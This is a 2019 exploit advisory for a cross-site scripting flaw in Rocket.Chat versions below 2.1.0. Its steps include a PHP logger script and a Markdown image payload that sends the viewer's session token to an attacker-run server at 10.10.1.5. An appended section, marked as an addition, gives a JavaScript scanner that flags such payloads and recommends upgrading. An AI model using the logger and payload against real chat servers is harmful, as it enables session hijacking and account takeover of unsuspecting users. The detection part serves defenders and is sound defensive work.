Rocket.Chat - Cross Site Scripting Exploit (Token Hijack)

2019.10.02
3H34N (IR)
Risk: Low
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

#[+] Title: Rocket.Chat - Cross Site Scripting Exploit (Token Hijack)
#[+] Product: Rocket.Chat
#[+] Vendor: https://rocket.chat/
#[+] Vulnerable Version(s): Rocket.Chat < 2.1.0
#
#
# Author : 3H34N
# Ehsan Nezami
# Website : nezami.me
# Twitter : https://twitter.com/mr_ehsane
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

1. Create l33t.php on a web server

<?php
// Append the value of the "leet" query parameter to logs.txt
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

2. Open a chat session

3. Send the payload with your web server URL

![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

4. The token will be written to logs.txt when the target sees your message.
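For defenders, the payload in step 3 has two visible properties that can be checked in stored or incoming messages: a Markdown image target on a host outside the chat server, and raw characters (backticks, braces) that RFC 3986 does not allow in a URI. The following added example, which is not part of the original advisory or of Rocket.Chat's code, flags both; `TRUSTED_HOSTS`, the function names and the two benign sample messages are assumptions.

```javascript
// Added example, not from the advisory. TRUSTED_HOSTS and the benign samples
// are constructed; only the first sample's payload string comes from the page.
const TRUSTED_HOSTS = new Set(["chat.example.org"]); // assumption: your own origins

// Markdown image or link: optional "!", [label], (target up to the first ")").
const MD_TARGET = /(!?)\[([^\]\n]*)\]\(([^)\n]*)\)/g;
// Characters RFC 3986 permits in a URI (unreserved, reserved, "%").
const URI_CHARS = /^[A-Za-z0-9\-._~:\/?#\[\]@!$&'()*+,;=%]*$/;

function hostOf(target) {
  try {
    return new URL(target).hostname; // absolute URL
  } catch (e) {
    return null; // relative target, resolves against the chat origin
  }
}

function inspectMessage(text) {
  const findings = [];
  for (const m of text.matchAll(MD_TARGET)) {
    const isImage = m[1] === "!";
    // Drop an optional Markdown title: (url "title")
    const target = m[3].trim().split(/\s+/)[0];
    const reasons = [];
    if (!URI_CHARS.test(target)) reasons.push("non-uri-characters");
    const host = hostOf(target);
    // Images are fetched when the message is viewed, links only when clicked.
    if (isImage && host !== null && !TRUSTED_HOSTS.has(host)) {
      reasons.push("auto-loaded-external-image");
    }
    if (reasons.length > 0) findings.push({ target, host, reasons });
  }
  return findings;
}

const SAMPLES = [
  "![title](http://10.10.1.5/l33t.php?leet=+`{}token`)",
  "see ![logo](https://chat.example.org/file-upload/abc/logo.png)",
  "docs are at [wiki](https://docs.example.com/setup?step=2)",
];

function scan(samples) {
  return samples.map((s) => inspectMessage(s));
}
console.log(JSON.stringify(scan(SAMPLES), null, 2));
```

Upgrading past the vulnerable range the advisory lists (Rocket.Chat < 2.1.0) is the actual fix; a scan like this only helps find messages that already carry the payload shape.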


Copyright 2019, cxsecurity.com

 
